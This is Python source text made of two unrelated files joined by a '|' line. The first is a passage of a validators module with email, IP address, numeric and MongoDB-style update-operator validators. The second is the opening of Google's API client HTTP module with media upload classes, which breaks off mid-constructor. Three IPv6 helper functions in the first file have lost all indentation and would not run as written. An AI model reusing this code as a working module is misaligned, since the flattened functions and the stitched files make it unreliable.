# then a domain name or a bracketed IPv4 literal.
EMAIL_RE = re.compile(
    r"(^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+"
    r"(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*" # dot-atom
    # quoted-string, see also http://tools.ietf.org/html/rfc2822#section-3.2.5
    r'|^"([\001-\010\013\014\016-\037!#-\[\]-\177]|'
    r'\\[\001-\011\013\014\016-\177])*"'
    r')@((?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+[A-Z]{2,6}\.?$)' # domain
    r'|\[(25[0-5]|2[0-4]\d|[0-1]?\d?\d)'
    r'(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\]$',
    re.IGNORECASE) # literal form, ipv4 address (SMTP 4.1.3)
# Ready-to-use validator instances built from the patterns above.
validate_email = EmailValidator(EMAIL_RE,
                                u'Enter a valid e-mail address.',
                                'invalid')
# Slug: letters, digits, underscores and hyphens only.
slug_re = re.compile(r'^[-\w]+$')
validate_slug = RegexValidator(
    slug_re,
    u"Enter a valid 'slug' consisting of letters, numbers, "
    u"underscores or hyphens.",
    'invalid')
# Dotted-quad IPv4 address with each octet limited to 0-255.
ipv4_re = re.compile(r'^(25[0-5]|2[0-4]\d|[0-1]?\d?\d)'
                     r'(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}$')
validate_ipv4_address = RegexValidator(ipv4_re,
                                       'Enter a valid IPv4 address.',
                                       'invalid')
def validate_ipv6_address(value):
    """Raise ValidationError (code 'invalid') unless value is a valid
    IPv6 address."""
    if is_valid_ipv6_address(value):
        return
    raise ValidationError('Enter a valid IPv6 address.',
                          code='invalid')
def validate_ipv46_address(value):
    """
    Uses both validate_ipv4_address and validate_ipv6_address
    to ensure a value is either a valid IPv4 or IPv6 address.
    """
    try:
        validate_ipv4_address(value)
        return  # Valid IPv4; nothing more to check.
    except ValidationError:
        pass
    try:
        validate_ipv6_address(value)
    except ValidationError:
        # Neither family accepted the value.
        raise ValidationError(u'Enter a valid IPv4 or IPv6 address.',
                              code='invalid')
# Maps the GenericIPAddressField 'protocol' option to a pair of
# (list of validators, error message used when validation fails).
ip_address_validator_map = {
    'both': ([validate_ipv46_address],
             'Enter a valid IPv4 or IPv6 address.'),
    'ipv4': ([validate_ipv4_address],
             'Enter a valid IPv4 address.'),
    'ipv6': ([validate_ipv6_address],
             'Enter a valid IPv6 address.'),
}
def ip_address_validators(protocol, unpack_ipv4):
    """Return the (validators, error message) pair for a
    GenericIPAddressField with the given protocol.

    This code is here, because it is exactly the same for the
    model and the form field.
    """
    # unpack_ipv4 only makes sense when both families are accepted.
    if unpack_ipv4 and protocol != 'both':
        raise ValueError(
            "You can only use `unpack_ipv4` if `protocol` is set to 'both'")
    lookup = protocol.lower()
    try:
        return ip_address_validator_map[lookup]
    except KeyError:
        raise ValueError("The protocol '%s' is unknown. Supported: %s"
                         % (protocol, ip_address_validator_map.keys()))
# A RegexValidator instance that ensures a value is a comma-separated
# list of integers.
# Fix: the pattern is now a raw string — '\d' in a plain string literal
# only works because Python passes unknown escapes through, and it emits
# a deprecation/syntax warning on modern interpreters.
comma_separated_int_list_re = re.compile(r'^[\d,]+$')
validate_comma_separated_integer_list = RegexValidator(
    comma_separated_int_list_re,
    u'Enter only digits separated by commas.',
    'invalid')
class BaseValidator(object):
    """Base class of the validation classes defined below."""
    message = u'Ensure this value is %(limit_value)s ' \
              u'(it is %(show_value)s).'
    code = 'limit_value'

    def compare(self, a, b):
        # Default comparison: fail whenever the cleaned value is not the
        # very same object as the limit. Subclasses override this.
        return a is not b

    def clean(self, x):
        # Hook for subclasses to transform the value before comparing
        # (e.g. the length validators take len(x)).
        return x

    def __init__(self, limit_value):
        self.limit_value = limit_value

    def __call__(self, value):
        cleaned = self.clean(value)
        params = {'limit_value': self.limit_value, 'show_value': cleaned}
        if self.compare(cleaned, self.limit_value):
            raise ValidationError(
                self.message % params,
                code=self.code,
                params=params,
            )
class MaxValueValidator(BaseValidator):
    """Fails with code 'max_value' when the value exceeds limit_value."""
    message = u'Ensure this value is less than or equal to %(limit_value)s.'
    code = 'max_value'

    def compare(self, a, b):
        return a > b
class MinValueValidator(BaseValidator):
    """Fails with code 'min_value' when the value is below limit_value."""
    message = u'Ensure this value is greater than or equal to %(limit_value)s.'
    code = 'min_value'

    def compare(self, a, b):
        return a < b
class MinLengthValidator(BaseValidator):
    """Fails with code 'min_length' when len(value) is below limit_value."""
    message = u'Ensure this value has at least %(limit_value)d characters (it has %(show_value)d).'
    code = 'min_length'

    def compare(self, a, b):
        return a < b

    def clean(self, x):
        # Compare lengths, not the values themselves.
        return len(x)
class MaxLengthValidator(BaseValidator):
    """Fails with code 'max_length' when len(value) exceeds limit_value."""
    message = u'Ensure this value has at most %(limit_value)d characters (it has %(show_value)d).'
    code = 'max_length'

    def compare(self, a, b):
        return a > b

    def clean(self, x):
        # Compare lengths, not the values themselves.
        return len(x)
def smart_unicode(stringy_thingy,
                  encoding='utf-8',
                  strings_only=False,
                  errors='strict'):
    """
    Returns a unicode object representing 'stringy_thingy'.
    Treats bytestrings using the 'encoding' codec.
    If strings_only is True, don't convert (some) non-string-like objects.
    """
    # Thin alias for force_unicode(); kept as a separate public name for
    # API compatibility.
    return force_unicode(stringy_thingy, encoding, strings_only, errors)
def smart_str(stringy_thingy,
              encoding='utf-8',
              strings_only=False,
              errors='strict'):
    """
    Returns a bytestring version of 'stringy_thingy',
    encoded as specified in 'encoding'.
    If strings_only is True, don't convert (some) non-string-like objects.
    smart_str is essentially the opposite of smart_unicode().
    It forces the first argument to a bytestring.
    The strings_only parameter has the same behavior as for
    smart_unicode() and force_unicode(). This is slightly different
    semantics from Python's builtin str() function,
    but the difference can be useful.
    """
    if strings_only and isinstance(stringy_thingy, (type(None), int)):
        # Caller asked for None/ints to pass through untouched.
        return stringy_thingy
    if not isinstance(stringy_thingy, basestring):
        # Not a string at all: fall back to the object's str().
        try:
            return str(stringy_thingy)
        except UnicodeEncodeError:
            if isinstance(stringy_thingy, Exception):
                # An Exception subclass containing non-ASCII data that doesn't
                # know how to print itself properly. We shouldn't raise a
                # further exception.
                return ' '.join([smart_str(arg, encoding, strings_only,
                                           errors) for arg in stringy_thingy])
            return unicode(stringy_thingy).encode(encoding, errors)
    elif isinstance(stringy_thingy, unicode):
        return stringy_thingy.encode(encoding, errors)
    elif stringy_thingy and encoding != 'utf-8':
        # Non-empty bytestring destined for a different encoding: assume
        # it is currently UTF-8 and transcode.
        return stringy_thingy.decode('utf-8', errors).encode(encoding, errors)
    else:
        # Already a bytestring in the requested (utf-8) encoding, or empty.
        return stringy_thingy
def is_protected_type(obj):
    """Determine if the object instance is of a protected type.

    Objects of protected types are preserved as-is when passed to
    force_unicode(strings_only=True).
    """
    protected_types = (type(None),
                       int, long,
                       datetime.datetime, datetime.date, datetime.time,
                       float, Decimal)
    return isinstance(obj, protected_types)
class WrappedUnicodeDecodeError(UnicodeDecodeError):
    """UnicodeDecodeError that also records the object being decoded."""
    def __init__(self, obj, *args):
        # Keep the offending object so __str__ can report it.
        self.obj = obj
        UnicodeDecodeError.__init__(self, *args)

    def __str__(self):
        base_message = UnicodeDecodeError.__str__(self)
        return '%s. You passed in %r (%s)' % (base_message,
                                              self.obj,
                                              type(self.obj))
def force_unicode(stringy_thingy,
                  encoding='utf-8',
                  strings_only=False,
                  errors='strict'):
    """
    Similar to smart_unicode, except that lazy instances are resolved to
    strings, rather than kept as lazy objects.
    If strings_only is True, don't convert (some) non-string-like objects.
    """
    # Handle the common case first, saves 30-40% in performance when s
    # is an instance of unicode. This function gets called often in that
    # setting.
    if isinstance(stringy_thingy, unicode):
        return stringy_thingy
    if strings_only and is_protected_type(stringy_thingy):
        # Caller asked for None/numbers/dates to pass through untouched.
        return stringy_thingy
    try:
        # (The stray trailing comma in the isinstance call below is
        # harmless — it just makes the second argument a 1-tuple entry.)
        if not isinstance(stringy_thingy, basestring,):
            if hasattr(stringy_thingy, '__unicode__'):
                stringy_thingy = unicode(stringy_thingy)
            else:
                try:
                    stringy_thingy = unicode(str(stringy_thingy),
                                             encoding,
                                             errors)
                except UnicodeEncodeError:
                    if not isinstance(stringy_thingy, Exception):
                        raise
                    # If we get to here, the caller has passed in an Exception
                    # subclass populated with non-ASCII data without special
                    # handling to display as a string. We need to handle this
                    # without raising a further exception. We do an
                    # approximation to what the Exception's standard str()
                    # output should be.
                    stringy_thingy = u' '.join([force_unicode(arg,
                                                              encoding,
                                                              strings_only,
                                                              errors) for \
                                                arg in stringy_thingy])
        elif not isinstance(stringy_thingy, unicode):
            # Note: We use .decode() here, instead of unicode(s, encoding,
            # errors), so that if s is a SafeString, it ends up being a
            # SafeUnicode at the end.
            stringy_thingy = stringy_thingy.decode(encoding, errors)
    except UnicodeDecodeError as excptn:
        if not isinstance(stringy_thingy, Exception):
            # Re-raise with the offending object attached for debugging.
            raise WrappedUnicodeDecodeError(stringy_thingy, *excptn.args)
        else:
            # If we get to here, the caller has passed in an Exception
            # subclass populated with non-ASCII bytestring data without a
            # working unicode method. Try to handle this without raising a
            # further exception by individually forcing the exception args
            # to unicode.
            stringy_thingy = u' '.join([force_unicode(arg,
                                                      encoding,
                                                      strings_only,
                                                      errors) for \
                                        arg in stringy_thingy])
    return stringy_thingy
# IP Address support
# This code was mostly based on ipaddr-py
# Copyright 2007 Google Inc. http://code.google.com/p/ipaddr-py/
# Licensed under the Apache License, Version 2.0 (the "License").
def clean_ipv6_address(ip_str, unpack_ipv4=False,
    error_message="This is not a valid IPv6 address"):
    """
    Cleans a IPv6 address string.
    Validity is checked by calling is_valid_ipv6_address() - if an
    invalid address is passed, ValidationError is raised.
    Replaces the longest continuous zero-sequence with "::" and
    removes leading zeroes and makes sure all hextets are lowercase.
    Args:
        ip_str: A valid IPv6 address.
        unpack_ipv4: if an IPv4-mapped address is found,
        return the plain IPv4 address (default=False).
        error_message: A error message for in the ValidationError.
    Returns:
        A compressed IPv6 address, or the same value
    """
    # Trackers for the longest run of all-zero hextets seen so far
    # (best_*) and the run currently being scanned (doublecolon_*).
    best_doublecolon_start = -1
    best_doublecolon_len = 0
    doublecolon_start = -1
    doublecolon_len = 0
    if not is_valid_ipv6_address(ip_str):
        raise ValidationError(error_message)
    # This algorithm can only handle fully exploded
    # IP strings
    ip_str = _explode_shorthand_ip_string(ip_str)
    ip_str = _sanitize_ipv4_mapping(ip_str)
    # If needed, unpack the IPv4 and return straight away
    # - no need in running the rest of the algorithm
    if unpack_ipv4:
        ipv4_unpacked = _unpack_ipv4(ip_str)
        if ipv4_unpacked:
            return ipv4_unpacked
    hextets = ip_str.split(":")
    for index in range(len(hextets)):
        # Remove leading zeroes
        hextets[index] = hextets[index].lstrip('0')
        if not hextets[index]:
            hextets[index] = '0'
        # Determine best hextet to compress
        if hextets[index] == '0':
            doublecolon_len += 1
            if doublecolon_start == -1:
                # Start of a sequence of zeros.
                doublecolon_start = index
            if doublecolon_len > best_doublecolon_len:
                # This is the longest sequence of zeros so far.
                best_doublecolon_len = doublecolon_len
                best_doublecolon_start = doublecolon_start
        else:
            # Non-zero hextet ends the current run.
            doublecolon_len = 0
            doublecolon_start = -1
    # Compress the most suitable hextet
    if best_doublecolon_len > 1:
        best_doublecolon_end = (best_doublecolon_start +
                                best_doublecolon_len)
        # For zeros at the end of the address.
        if best_doublecolon_end == len(hextets):
            hextets += ['']
        # Replacing the run with a single '' makes join() emit '::'.
        hextets[best_doublecolon_start:best_doublecolon_end] = ['']
        # For zeros at the beginning of the address.
        if best_doublecolon_start == 0:
            hextets = [''] + hextets
    result = ":".join(hextets)
    return result.lower()
def _sanitize_ipv4_mapping(ip_str):
"""
Sanitize IPv4 mapping in a expanded IPv6 address.
This converts ::ffff:0a0a:0a0a to ::ffff:10.10.10.10.
If there is nothing to sanitize, returns an unchanged
string.
Args:
ip_str: A string, the expanded IPv6 address.
Returns:
The sanitized output string, if applicable.
"""
if not ip_str.lower().startswith('0000:0000:0000:0000:0000:ffff:'):
# not an ipv4 mapping
return ip_str
hextets = ip_str.split(':')
if '.' in hextets[-1]:
# already sanitized
return ip_str
ipv4_address = "%d.%d.%d.%d" % (
int(hextets[6][0:2], 16),
int(hextets[6][2:4], 16),
int(hextets[7][0:2], 16),
int(hextets[7][2:4], 16),
)
result = ':'.join(hextets[0:6])
result += ':' + ipv4_address
return result
def _unpack_ipv4(ip_str):
"""
Unpack an IPv4 address that was mapped in a compressed IPv6 address.
This converts 0000:0000:0000:0000:0000:ffff:10.10.10.10 to 10.10.10.10.
If there is nothing to sanitize, returns None.
Args:
ip_str: A string, the expanded IPv6 address.
Returns:
The unpacked IPv4 address, or None if there was nothing to unpack.
"""
if not ip_str.lower().startswith('0000:0000:0000:0000:0000:ffff:'):
return None
hextets = ip_str.split(':')
return hextets[-1]
def is_valid_ipv6_address(ip_str):
    """
    Ensure we have a valid IPv6 address.
    Args:
        ip_str: A string, the IPv6 address.
    Returns:
        A boolean, True if this is a valid IPv6 address.
    """
    # We need to have at least one ':'.
    if ':' not in ip_str:
        return False
    # We can only have one '::' shortener.
    if ip_str.count('::') > 1:
        return False
    # '::' should be encompassed by start, digits or end.
    if ':::' in ip_str:
        return False
    # A single colon can neither start nor end an address.
    if ((ip_str.startswith(':') and not ip_str.startswith('::')) or
        (ip_str.endswith(':') and not ip_str.endswith('::'))):
        return False
    # We can never have more than 7 ':' (1::2:3:4:5:6:7:8 is invalid)
    if ip_str.count(':') > 7:
        return False
    # If we have no concatenation, we need to have 8 fields with 7 ':'.
    if '::' not in ip_str and ip_str.count(':') != 7:
        # We might have an IPv4 mapped address.
        if ip_str.count('.') != 3:
            return False
    # Expand any '::' so every group can be inspected individually.
    ip_str = _explode_shorthand_ip_string(ip_str)
    # Now that we have that all squared away, let's check that each of the
    # hextets are between 0x0 and 0xFFFF.
    for hextet in ip_str.split(':'):
        if hextet.count('.') == 3:
            # If we have an IPv4 mapped address, the IPv4 portion has to
            # be at the end of the IPv6 portion.
            if not ip_str.split(':')[-1] == hextet:
                return False
            try:
                validate_ipv4_address(hextet)
            except ValidationError:
                return False
        else:
            try:
                # a value error here means that we got a bad hextet,
                # something like 0xzzzz
                if int(hextet, 16) < 0x0 or int(hextet, 16) > 0xFFFF:
                    return False
            except ValueError:
                return False
    return True
def _explode_shorthand_ip_string(ip_str):
    """Expand a shortened IPv6 address to its full form.

    Args:
        ip_str: A string, the IPv6 address.
    Returns:
        A string, the expanded IPv6 address (every hextet zero-padded to
        four lowercase characters).
    """
    if not _is_shorthand_ip(ip_str):
        # We've already got a longhand ip_str.
        return ip_str
    # A trailing dotted-quad (v4-mapped) counts as the final group, so
    # only seven hextets need filling in that case.
    if '.' in ip_str.split(':')[-1]:
        target_groups = 7
    else:
        target_groups = 8
    halves = ip_str.split('::')
    if len(halves) > 1:
        # Expand the '::' with enough '0000' groups to reach the target.
        left = halves[0].split(':')
        right = halves[1].split(':')
        zero_fill = ['0000'] * (target_groups - len(left) - len(right))
        groups = left + zero_fill + right
    else:
        groups = ip_str.split(':')
    # Zero-pad every hextet to 4 lower case characters; hextets shorter
    # than 4 characters have missing leading 0's.
    padded = [('0' * (4 - len(group)) + group).lower() for group in groups]
    return ':'.join(padded)
def _is_shorthand_ip(ip_str):
"""Determine if the address is shortened.
Args:
ip_str: A string, the IPv6 address
Returns:
A boolean, True if the address is shortened.
"""
if ip_str.count('::') == 1:
return True
if list(filter(lambda x: len(x) < 4, ip_str.split(':'))):
return True
return False
def validate_bool(data):
    """Raise ValidationError unless data is True or False."""
    if isinstance(data, bool):
        return
    raise ValidationError("Not a bool.")
def validate_long(data):
    """If the data is (or can become) a long
    i.e. a 64 bit integer."""
    # long() accepts ints, floats (truncating) and numeric strings;
    # anything it cannot coerce is reported as invalid.
    try:
        long(data)
    except (ValueError, TypeError):
        raise ValidationError('Not a long')
def validate_char(data):
    """A string field, for small-to medium-sized strings.
    TODO: this will have to become a method to implement limit.
    """
    if isinstance(data, basestring):
        return
    raise ValidationError("%s is not a char." % data)
def validate_date(data):
    """Raise ValidationError unless data is a datetime.date instance."""
    if isinstance(data, datetime.date):
        return
    raise ValidationError("Not a date.")
def validate_datetime(data):
    """Raise ValidationError unless data is a datetime.datetime instance."""
    if isinstance(data, datetime.datetime):
        return
    raise ValidationError("Not a datetime.")
def validate_decimal(data):
    """Raise ValidationError unless data is a decimal.Decimal instance."""
    if isinstance(data, Decimal):
        return
    raise ValidationError("Not a decimal.")
def validate_filepath(data):
    """At the moment, this just checks that the value is a string."""
    if isinstance(data, basestring):
        return
    raise ValidationError("Not a filepath.")
def validate_float(data):
    """Raise ValidationError unless data is a float instance."""
    if isinstance(data, float):
        return
    raise ValidationError("Not a float.")
def validate_integer(value):
    """Ensure a value is an integer."""
    # Accepts anything int() can coerce (ints, floats — truncating — and
    # numeric strings); only coercion failures are rejected.
    try:
        int(value)
    except (ValueError, TypeError):
        raise ValidationError('Not an Integer.')
def validate_nullboolean(data):
    """Raise ValidationError unless data is True, False or None."""
    if isinstance(data, (bool, type(None))):
        return
    raise ValidationError("Not a nullboolean.")
def validate_postiveinteger(data):
    """Ensure a value is a positive (here: non-negative) integer.

    Note: 0 is accepted. The misspelled function name is kept because it
    is part of the public API (referenced from DISPATCHER).
    """
    try:
        valid_int = int(data)
    except (ValueError, TypeError):
        raise ValidationError('Not a positive integer.')
    else:
        if valid_int < 0:
            # Fixed typo in the error message (was 'Postive integer ...').
            raise ValidationError('Positive integer cannot be negative.')
def validate_smallinteger(data):
    """Integer between -32768 to +32767."""
    try:
        number = int(data)
    except (ValueError, TypeError):
        raise ValidationError('Not a small integer.')
    if number < -32768 or number > 32767:
        raise ValidationError('Not a small integer.')
def validate_biginteger(data):
    """Big (8 byte) integer: -2**63 .. 2**63-1."""
    try:
        number = int(data)
    except (ValueError, TypeError):
        raise ValidationError('Not a big integer.')
    if number < -9223372036854775808 or number > 9223372036854775807:
        raise ValidationError('Not a big integer.')
def validate_positivesmallinteger(data):
    """Non-negative small integer: 0 .. 32767."""
    try:
        number = int(data)
    except (ValueError, TypeError):
        raise ValidationError('Not a positive small integer.')
    if number < 0 or number > 32767:
        raise ValidationError('Not a positive small integer.')
def validate_text(data):
    """Text of unlimited size."""
    # NOTE(review): the error message says "char" — it looks copy-pasted
    # from validate_char, but is kept byte-identical for compatibility.
    if isinstance(data, basestring):
        return
    raise ValidationError("Not a char.")
def validate_time(data):
    """Raise ValidationError unless data is a datetime.time instance."""
    if isinstance(data, datetime.time):
        return
    raise ValidationError("Not a time.")
def validate_url(data):
    """Validates a valid URL."""
    # A fresh URLValidator is built per call; no state is kept between uses.
    URLValidator()(data)
def validate_verified_url(data):
    """Validates a valid and existing URL (performs a network request).
    Read the warnings above."""
    URLValidator(verify_exists=True)(data)
def validate_xml(data):
    """See if data is well formed XML.

    This is pretty lenient; it does not check for validity against a DTD
    or schema, only that the document parses.
    """
    try:
        xml.parsers.expat.ParserCreate().Parse(data)
    except xml.parsers.expat.ExpatError:
        raise ValidationError("Not well formed.")
def validate_dict(data):
    """Very simple, duck-typed check that data is a dict:
    anything exposing a .keys() method passes."""
    try:
        data.keys()
    except AttributeError:
        # Fixed grammar in the error message (was 'Not an dict.').
        raise ValidationError('Not a dict.')
def validate_list(data):
    """Duck-typed list check: data must expose an .insert attribute."""
    try:
        data.insert
    except AttributeError:
        raise ValidationError('Not a list.')
def validate_file(data):
    """Not implemented yet; always raises NotImplementedError."""
    raise NotImplementedError(data)
def validate_image(data):
    """Not implemented yet; always raises NotImplementedError."""
    raise NotImplementedError(data)
def validate_embedded(data,
                      embedded_models,
                      handle_none=False):
    """Validate one embedded document against its declared model.

    The document's '_model' key selects the model from embedded_models.
    """
    try:
        model = embedded_models[data['_model']]
    except KeyError:
        # Covers both a missing '_model' key and an unknown model name.
        raise ValidationError('Missing _model key on embedded data.')
    validate_model_instance(model,
                            data,
                            handle_none=handle_none,
                            embedded_models=embedded_models)
def validate_embedded_list(data,
                           embedded_models,
                           handle_none=False):
    """Validate every embedded document in a list.

    The container must be list-like (expose .insert); each element's
    '_model' key selects its model from embedded_models.
    """
    try:
        data.insert
    except AttributeError:
        raise ValidationError('Not an embedded list.')
    for item in data:
        try:
            model = embedded_models[item['_model']]
        except KeyError:
            # Covers both a missing '_model' key and an unknown model name.
            raise ValidationError('Missing _model key on embedded data.')
        validate_model_instance(model,
                                item,
                                handle_none=handle_none,
                                embedded_models=embedded_models)
def validate_set_modifier(model_validator, model, field, field_type, value):
    """$set: assigns value to field; every datatype is supported, so the
    value only needs to validate against the field's own type."""
    model_validator.validate_field(field_type, value)
def validate_unset_modifier(model_validator, model, field, field_type, value):
    """$unset: deletes a field; only allowed when the field's schema marks
    'required' explicitly as False."""
    # NOTE(review): a schema with no 'required' key at all is also
    # rejected as "required" — confirm that strictness is intended.
    if 'required' not in model[field] or model[field]['required'] != False:
        raise ValidationError(
            'Field %s cannot be unset because it is required.' % field,
            code='invalid')
def validate_inc_modifier(model_validator, model, field, field_type, value):
    """$inc: increments field by the number value if field is present
    in the object, otherwise sets field to the number value.
    This can also be used to decrement by using a negative value.

    Raises ValidationError when value is not a number or the target
    field is not a numeric type.
    """
    # We need to check that the target can be incremented, and that
    # the value is sensible
    if not isinstance(value, Number):
        raise ValidationError(
            'Cannot increment by value '
            '%s because it is not a number.' % value,
            code='invalid')
    if field_type not in (
            'BigInteger', 'Decimal', 'Float', 'Integer', 'LongInteger',
            'PositiveInteger', 'PositiveSmallInteger', 'SmallInteger'):
        # Fixed: the two adjacent string literals previously concatenated
        # without a space ('field %sbecause ...').
        raise ValidationError(
            'Cannot increment field %s '
            'because it is not a numeric type.' % field,
            code='invalid')
    # Both branches of the original if/else on positive types performed
    # this identical call, so the duplication is collapsed: validate the
    # magnitude of the increment against the field type (a decrement may
    # transiently apply to positive types).
    model_validator.validate_field(field_type, abs(value))
def validate_array_modifier(model_validator, model, field, field_type, value):
    """Shared validator for the list modifiers ($push, $pop, $pull, ...):
    the target field must be a list type."""
    if field_type in ('EmbeddedList', 'List'):
        return
    raise ValidationError(
        'Field %s is not a list type.' % field,
        code='invalid')
def validate_rename_modifier(model_validator, model, field, field_type, value):
    """$rename: renames 'old_field_name' to 'new_field_name' — not
    supported here, so this always raises."""
    raise ValidationError(
        'Rename is currently not supported.',
        code='invalid')
def validate_bitwise_modifier(model_validator, model, field, field_type, value):
    """$bit: bitwise update of a field; only integer field types qualify."""
    integer_types = (
        'BigInteger', 'Integer', 'LongInteger',
        'PositiveInteger', 'PositiveSmallInteger', 'SmallInteger')
    if field_type not in integer_types:
        raise ValidationError(
            'Field %s is not an integer type.' % field,
            code='invalid')
# Maps MongoDB-style update operators to the validator enforcing each
# operator's constraints. All list operators share validate_array_modifier.
MODIFICATION_DISPATCHER = {
    '$set': validate_set_modifier,
    '$unset': validate_unset_modifier,
    '$inc': validate_inc_modifier,
    '$push': validate_array_modifier,
    '$pushAll': validate_array_modifier,
    '$addToSet': validate_array_modifier,
    '$each': validate_array_modifier,
    '$pop': validate_array_modifier,
    '$pull': validate_array_modifier,
    '$pullAll': validate_array_modifier,
    '$rename': validate_rename_modifier,
    '$bit': validate_bitwise_modifier
}
# Ordered (field type name, validator callable) pairs used to look up the
# validator for a model field's declared type.
# NOTE(review): validate_embedded and validate_embedded_list take extra
# arguments (embedded_models, handle_none) — presumably the caller
# special-cases them; confirm at the call site.
DISPATCHER = (
    ('Boolean', validate_bool),
    ('BigInteger', validate_biginteger),
    ('Char', validate_char),
    ('CommaSeparatedInteger', validate_comma_separated_integer_list),
    ('Date', validate_date),
    ('DateTime', validate_datetime),
    ('Decimal', validate_decimal),
    ('Dict', validate_dict),
    ('Email', validate_email),
    ('Embedded', validate_embedded),
    ('EmbeddedList', validate_embedded_list),
    ('File', validate_file),
    ('FilePath', validate_filepath),
    ('Float', validate_float),
    ('Image', validate_image),
    ('Integer', validate_integer),
    ('IPAddress', validate_ipv46_address),
    ('IP4Address', validate_ipv4_address),
    ('IP6Address', validate_ipv6_address),
    ('List', validate_list),
    ('LongInteger', validate_long),
    ('NullBoolean', validate_nullboolean),
    ('PositiveInteger', validate_postiveinteger),
    ('PositiveSmallInteger', validate_positivesmallinteger),
    ('Slug', validate_slug),
    ('SmallInteger', validate_smallinteger),
    ('Text', validate_text),
    ('Time', validate_time),
    ('URL', validate_url),
    ('VerifiedURL', validate_verified_url),
    ('XML', validate_xml),
)
|
# Copyright (C) 2012 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Classes to encapsulate a single HTTP request.
The classes implement a command pattern, with every
object supporting an execute() method that does the
actual HTTP request.
"""
__author__ = 'jcgregorio@google.com (Joe Gregorio)'
import StringIO
import base64
import copy
import gzip
import httplib2
import mimeparse
import mimetypes
import os
import urllib
import urlparse
import uuid
from email.generator import Generator
from email.mime.multipart import MIMEMultipart
from email.mime.nonmultipart import MIMENonMultipart
from email.parser import FeedParser
from errors import BatchError
from errors import HttpError
from errors import ResumableUploadError
from errors import UnexpectedBodyError
from errors import UnexpectedMethodError
from model import JsonModel
from oauth2client.anyjson import simplejson
# Default chunk size for resumable transfers: 512 KiB per HTTP request.
DEFAULT_CHUNK_SIZE = 512*1024
class MediaUploadProgress(object):
  """Status of a resumable upload."""
  def __init__(self, resumable_progress, total_size):
    """Constructor.
    Args:
      resumable_progress: int, bytes sent so far.
      total_size: int, total bytes in complete upload, or None if the total
        upload size isn't known ahead of time.
    """
    self.resumable_progress = resumable_progress
    self.total_size = total_size
  def progress(self):
    """Percent of upload completed, as a float.
    Returns:
      the percentage complete as a float, returning 0.0 if the total size of
      the upload is unknown.
    """
    if self.total_size is None:
      # Unknown total size: report no measurable progress.
      return 0.0
    return float(self.resumable_progress) / float(self.total_size)
class MediaDownloadProgress(object):
  """Status of a resumable download."""
  def __init__(self, resumable_progress, total_size):
    """Constructor.
    Args:
      resumable_progress: int, bytes received so far.
      total_size: int, total bytes in complete download.
    """
    self.resumable_progress = resumable_progress
    self.total_size = total_size
  def progress(self):
    """Percent of download completed, as a float.
    Returns:
      the percentage complete as a float, returning 0.0 if the total size of
      the download is unknown.
    """
    if self.total_size is None:
      # Unknown total size: report no measurable progress.
      return 0.0
    return float(self.resumable_progress) / float(self.total_size)
class MediaUpload(object):
  """Describes a media object to upload.
  Base class that defines the interface of MediaUpload subclasses.
  Note that subclasses of MediaUpload may allow you to control the chunksize
  when upload a media object. It is important to keep the size of the chunk as
  large as possible to keep the upload efficient. Other factors may influence
  the size of the chunk you use, particularly if you are working in an
  environment where individual HTTP requests may have a hardcoded time limit,
  such as under certain classes of requests under Google App Engine.
  """
  def chunksize(self):
    """Chunk size for resumable uploads.
    Returns:
      Chunk size in bytes.
    """
    raise NotImplementedError()
  def mimetype(self):
    """Mime type of the body.
    Returns:
      Mime type.
    """
    # Subclasses may override; the default is the generic binary type.
    return 'application/octet-stream'
  def size(self):
    """Size of upload.
    Returns:
      Size of the body, or None of the size is unknown.
    """
    return None
  def resumable(self):
    """Whether this upload is resumable.
    Returns:
      True if resumable upload or False.
    """
    return False
  def getbytes(self, begin, end):
    """Get bytes from the media.
    Args:
      begin: int, offset from beginning of file.
      length: int, number of bytes to read, starting at begin.
    Returns:
      A string of bytes read. May be shorter than length if EOF was reached
      first.
    """
    # NOTE(review): the second parameter is named 'end' here, but the
    # docstring and every subclass in this file call it 'length' (a byte
    # count, not an offset) — confirm and align the abstract signature.
    raise NotImplementedError()
  def _to_json(self, strip=None):
    """Utility function for creating a JSON representation of a MediaUpload.
    Args:
      strip: array, An array of names of members to not include in the JSON.
    Returns:
      string, a JSON representation of this instance, suitable to pass to
      from_json().
    """
    t = type(self)
    d = copy.copy(self.__dict__)
    if strip is not None:
      # Drop members that cannot be serialized (e.g. open file handles).
      for member in strip:
        del d[member]
    # Record the concrete class so new_from_json() can rebuild the object.
    d['_class'] = t.__name__
    d['_module'] = t.__module__
    return simplejson.dumps(d)
  def to_json(self):
    """Create a JSON representation of an instance of MediaUpload.
    Returns:
      string, a JSON representation of this instance, suitable to pass to
      from_json().
    """
    return self._to_json()
  @classmethod
  def new_from_json(cls, s):
    """Utility class method to instantiate a MediaUpload subclass from a JSON
    representation produced by to_json().
    Args:
      s: string, JSON from to_json().
    Returns:
      An instance of the subclass of MediaUpload that was serialized with
      to_json().
    """
    data = simplejson.loads(s)
    # Find and call the right classmethod from_json() to restore the object.
    module = data['_module']
    m = __import__(module, fromlist=module.split('.')[:-1])
    kls = getattr(m, data['_class'])
    from_json = getattr(kls, 'from_json')
    return from_json(s)
class MediaFileUpload(MediaUpload):
  """A MediaUpload for a file.
  Construct a MediaFileUpload and pass as the media_body parameter of the
  method. For example, if we had a service that allowed uploading images:
    media = MediaFileUpload('cow.png', mimetype='image/png',
      chunksize=1024*1024, resumable=True)
    farm.animals().insert(
        id='cow',
        name='cow.png',
        media_body=media).execute()
  """
  def __init__(self, filename, mimetype=None, chunksize=DEFAULT_CHUNK_SIZE, resumable=False):
    """Constructor.
    Args:
      filename: string, Name of the file.
      mimetype: string, Mime-type of the file. If None then a mime-type will be
        guessed from the file extension.
      chunksize: int, File will be uploaded in chunks of this many bytes. Only
        used if resumable=True.
      resumable: bool, True if this is a resumable upload. False means upload
        in a single request.
    """
    self._filename = filename
    self._size = os.path.getsize(filename)
    # The file is opened lazily on the first getbytes() call.
    self._fd = None
